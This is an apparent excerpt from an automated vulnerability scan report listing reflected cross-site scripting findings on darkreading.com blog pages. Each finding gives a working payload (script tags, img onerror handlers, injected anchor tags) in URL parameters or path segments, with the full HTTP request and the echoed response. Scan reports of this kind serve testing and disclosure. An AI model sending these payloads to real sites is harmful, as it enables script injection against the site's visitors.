3.215. http://www.darkreading.com/blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 451dd"><script>alert(1)</script>cc54c12462d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html?451dd"><script>alert(1)</script>cc54c12462d=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c14ff"><a>07d4fb549af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700535c14ff"><a>07d4fb549af/using-the-36-stratagems-for-social-engineering.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f693d'><img%20src%3da%20onerror%3dalert(1)>41e2542c8f3 was submitted in the REST URL parameter 3. This input was echoed as f693d'><img src=a onerror=alert(1)>41e2542c8f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700535/using-the-36-stratagems-for-social-engineering.htmlf693d'><img%20src%3da%20onerror%3dalert(1)>41e2542c8f3 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 208bd"><a>6d68db41da5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700535/using-the-36-stratagems-for-social-engineering.html208bd"><a>6d68db41da5 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Using The ...[SNIP]... 6-stratagems-for-social-engineering.html208bd%22%3E%3Ca%3E6d68db41da5&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700535/using-the-36-stratagems-for-social-engineering.html208bd"><a>6d68db41da5"> ...[SNIP]...
3.219. http://www.darkreading.com/blog/227700535/using-the-36-stratagems-for-social-engineering.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e32e"><script>alert(1)</script>e89c34f8e53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700535/using-the-36-stratagems-for-social-engineering.html?8e32e"><script>alert(1)</script>e89c34f8e53=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97406"><a>9c13987c8d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770054597406"><a>9c13987c8d1/snort-ing-out-anomalies.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d507'><img%20src%3da%20onerror%3dalert(1)>01ef1e0a04d was submitted in the REST URL parameter 3. This input was echoed as 2d507'><img src=a onerror=alert(1)>01ef1e0a04d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700545/snort-ing-out-anomalies.html2d507'><img%20src%3da%20onerror%3dalert(1)>01ef1e0a04d HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b8d1"><a>badd16bacb3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700545/snort-ing-out-anomalies.html5b8d1"><a>badd16bacb3 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Snort'ing ...[SNIP]... rkreading.com%2Fblog%2F227700545%2Fsnort-ing-out-anomalies.html5b8d1%22%3E%3Ca%3Ebadd16bacb3&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700545/snort-ing-out-anomalies.html5b8d1"><a>badd16bacb3"> ...[SNIP]...
3.223. http://www.darkreading.com/blog/227700545/snort-ing-out-anomalies.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/227700545/snort-ing-out-anomalies.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e908b"><script>alert(1)</script>a69370484ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700545/snort-ing-out-anomalies.html?e908b"><script>alert(1)</script>a69370484ad=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464b9"><a>708983cfdee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700548464b9"><a>708983cfdee/real-world-attacks-with-social-engineering-tookit.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4066'><img%20src%3da%20onerror%3dalert(1)>9ce9250d8a9 was submitted in the REST URL parameter 3. This input was echoed as f4066'><img src=a onerror=alert(1)>9ce9250d8a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700548/real-world-attacks-with-social-engineering-tookit.htmlf4066'><img%20src%3da%20onerror%3dalert(1)>9ce9250d8a9 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26401"><a>1987aa66c35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700548/real-world-attacks-with-social-engineering-tookit.html26401"><a>1987aa66c35 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Real-Worl ...[SNIP]... s-with-social-engineering-tookit.html26401%22%3E%3Ca%3E1987aa66c35&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700548/real-world-attacks-with-social-engineering-tookit.html26401"><a>1987aa66c35"> ...[SNIP]...
3.227. http://www.darkreading.com/blog/227700548/real-world-attacks-with-social-engineering-tookit.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef7d0"><script>alert(1)</script>dfe18398e9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700548/real-world-attacks-with-social-engineering-tookit.html?ef7d0"><script>alert(1)</script>dfe18398e9a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60c74'><img%20src%3da%20onerror%3dalert(1)>1727b95a01f was submitted in the REST URL parameter 3. This input was echoed as 60c74'><img src=a onerror=alert(1)>1727b95a01f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700577/suspected-child-porn-hub-taken-offline.html60c74'><img%20src%3da%20onerror%3dalert(1)>1727b95a01f HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88ab9"><a>125a31d3d96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700577/suspected-child-porn-hub-taken-offline.html88ab9"><a>125a31d3d96 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Suspected ...[SNIP]... 77%2Fsuspected-child-porn-hub-taken-offline.html88ab9%22%3E%3Ca%3E125a31d3d96&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700577/suspected-child-porn-hub-taken-offline.html88ab9"><a>125a31d3d96"> ...[SNIP]...
3.230. http://www.darkreading.com/blog/227700577/suspected-child-porn-hub-taken-offline.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db01"><script>alert(1)</script>360360a683a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700577/suspected-child-porn-hub-taken-offline.html?9db01"><script>alert(1)</script>360360a683a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce99c"><a>0ff75152fde was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700656ce99c"><a>0ff75152fde/friction-free-security.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 83517'><img%20src%3da%20onerror%3dalert(1)>6a5a66b0718 was submitted in the REST URL parameter 3. This input was echoed as 83517'><img src=a onerror=alert(1)>6a5a66b0718 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700656/friction-free-security.html83517'><img%20src%3da%20onerror%3dalert(1)>6a5a66b0718 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd94d"><a>e36f7092b58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700656/friction-free-security.htmldd94d"><a>e36f7092b58 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Friction- ...[SNIP]... darkreading.com%2Fblog%2F227700656%2Ffriction-free-security.htmldd94d%22%3E%3Ca%3Ee36f7092b58&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700656/friction-free-security.htmldd94d"><a>e36f7092b58"> ...[SNIP]...
3.234. http://www.darkreading.com/blog/227700656/friction-free-security.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/227700656/friction-free-security.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e48"><script>alert(1)</script>c289f73ad81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700656/friction-free-security.html?f2e48"><script>alert(1)</script>c289f73ad81=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e2f"><a>c5535a3f793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770068294e2f"><a>c5535a3f793/protecting-your-network-from-the-unpatchable.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48b6b'><img%20src%3da%20onerror%3dalert(1)>d0fbaa2056e was submitted in the REST URL parameter 3. This input was echoed as 48b6b'><img src=a onerror=alert(1)>d0fbaa2056e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700682/protecting-your-network-from-the-unpatchable.html48b6b'><img%20src%3da%20onerror%3dalert(1)>d0fbaa2056e HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b335"><a>a12afae223 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700682/protecting-your-network-from-the-unpatchable.html4b335"><a>a12afae223 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Protectin ...[SNIP]... ting-your-network-from-the-unpatchable.html4b335%22%3E%3Ca%3Ea12afae223&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700682/protecting-your-network-from-the-unpatchable.html4b335"><a>a12afae223"> ...[SNIP]...
3.238. http://www.darkreading.com/blog/227700682/protecting-your-network-from-the-unpatchable.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 237c3"><script>alert(1)</script>6549d20e526 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700682/protecting-your-network-from-the-unpatchable.html?237c3"><script>alert(1)</script>6549d20e526=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34e41"><a>2b538cc6f88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770074134e41"><a>2b538cc6f88/conquering-large-web-apps-with-solid-methodology.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d4bdd'><img%20src%3da%20onerror%3dalert(1)>6c66d609c46 was submitted in the REST URL parameter 3. This input was echoed as d4bdd'><img src=a onerror=alert(1)>6c66d609c46 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700741/conquering-large-web-apps-with-solid-methodology.htmld4bdd'><img%20src%3da%20onerror%3dalert(1)>6c66d609c46 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c69"><a>a84db8a5ded was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700741/conquering-large-web-apps-with-solid-methodology.html78c69"><a>a84db8a5ded HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Conquerin ...[SNIP]... e-web-apps-with-solid-methodology.html78c69%22%3E%3Ca%3Ea84db8a5ded&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700741/conquering-large-web-apps-with-solid-methodology.html78c69"><a>a84db8a5ded"> ...[SNIP]...
3.242. http://www.darkreading.com/blog/227700741/conquering-large-web-apps-with-solid-methodology.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a76f1"><script>alert(1)</script>ee9f8702759 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700741/conquering-large-web-apps-with-solid-methodology.html?a76f1"><script>alert(1)</script>ee9f8702759=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d77"><a>2cbc575524c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770076613d77"><a>2cbc575524c/embedded-systems-can-mean-embedded-vulnerabilities.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
